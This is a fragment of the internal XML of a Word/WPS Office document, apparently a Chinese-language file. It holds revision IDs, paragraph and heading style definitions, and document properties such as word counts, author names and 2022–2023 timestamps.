    <w:rsid w:val="00807DD6"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="008307A7"/>
    <w:rsid w:val="00837C7C"/>
    <w:rsid w:val="00853159"/>
    <w:rsid w:val="00862F19"/>
    <w:rsid w:val="0087043C"/>
    <w:rsid w:val="00881CB2"/>
    <w:rsid w:val="00882C1B"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="0089602B"/>
    <w:rsid w:val="008D368A"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="008D69B5"/>
    <w:rsid w:val="00A3240D"/>
    <w:rsid w:val="00A32A80"/>
    <w:rsid w:val="00A340D5"/>
    <w:rsid w:val="00A42329"/>
    <w:rsid w:val="00A7090E"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00AC3FD9"/>
    <w:rsid w:val="00AE3DEA"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00B6372C"/>
    <w:rsid w:val="00B96E57"/>
    <w:rsid w:val="00BB26C5"/>
    <w:rsid w:val="00BB77C7"/>
    <w:rsid w:val="00C86B82"/>
    <w:rsid w:val="00CC1A5E"/>
    <w:rsid w:val="00CE38AE"/>
    <w:rsid w:val="00D35FE7"/>
    <w:rsid w:val="00D56CC8"/>
    <w:rsid w:val="00DC7824"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E45051"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00F03B96"/>
    <w:rsid w:val="00F078AF"/>
    <w:rsid w:val="00F24A7E"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00F57CCF"/>
    <w:rsid w:val="00F96C19"/>
    <w:rsid w:val="00FB5308"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="00FE071F"/>
    <w:rsid w:val="00FE57A7"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="11057819"/>
    <w:rsid w:val="113F5017"/>
    <w:rsid w:val="237C2E6E"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="34D523DE"/>
    <w:rsid w:val="360C6F49"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="43896021"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="46887E10"/>
    <w:rsid w:val="4CF66F3E"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="5D652628"/>
    <w:rsid w:val="60536729"/>
    <w:rsid w:val="6B123884"/>
    <w:rsid w:val="6C814395"/>
    <w:rsid w:val="6CA850CC"/>
    <w:rsid w:val="6E65076F"/>
    <w:rsid w:val="6E7A0512"/>
    <w:rsid w:val="6F2E3D2E"/>
    <w:rsid w:val="6F871FE7"/>
    <w:rsid w:val="71305E2E"/>
    <w:rsid w:val="72320FFF"/>
    <w:rsid w:val="72FE5900"/>
    <w:rsid w:val="734548D9"/>
    <w:rsid w:val="777D7D00"/>
    <w:rsid w:val="78A85C56"/>
    <w:rsid w:val="7EB8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qFormat="1" w:uiPriority="0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keepLines/>
      <w:spacing w:before="100" w:beforeLines="100" w:after="100" w:afterLines="100" w:line="400" w:lineRule="exact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99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50" w:line="400" w:lineRule="exact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99"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr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cs="黑体"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:lang w:eastAsia="en-US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Body Text Indent 2"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:ind w:firstLine="480" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="000000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qFormat/>
    <w:uiPriority w:val="39"/>
    <w:rPr>
      <w:b/>
    </w:r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toc 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="1680"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="2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paragraph" w:styleId="14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List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="19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0">
    <w:name w:val="WPSOffice手动目录 1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0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1">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:kern w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="label"/>
    <w:basedOn w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="HTML 预设格式 字符"/>
    <w:basedOn w:val="16"/>
    <w:link w:val="13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DA3E4B-40AD-40F8-A551-80ACD5B2E0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1435</Words>
  <Characters>4514</Characters>
  <Lines>65</Lines>
  <Paragraphs>18</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4844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2022-07-21T12:30:00Z</dcterms:created>
  <dc:creator>复活少年</dc:creator>
  <cp:lastModifiedBy>微信用户</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-19T17:57:55Z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0C6BEE73EFD84A549A54150DA2A3FEEC_13</vt:lpwstr>
  </property>
</Properties>
</file>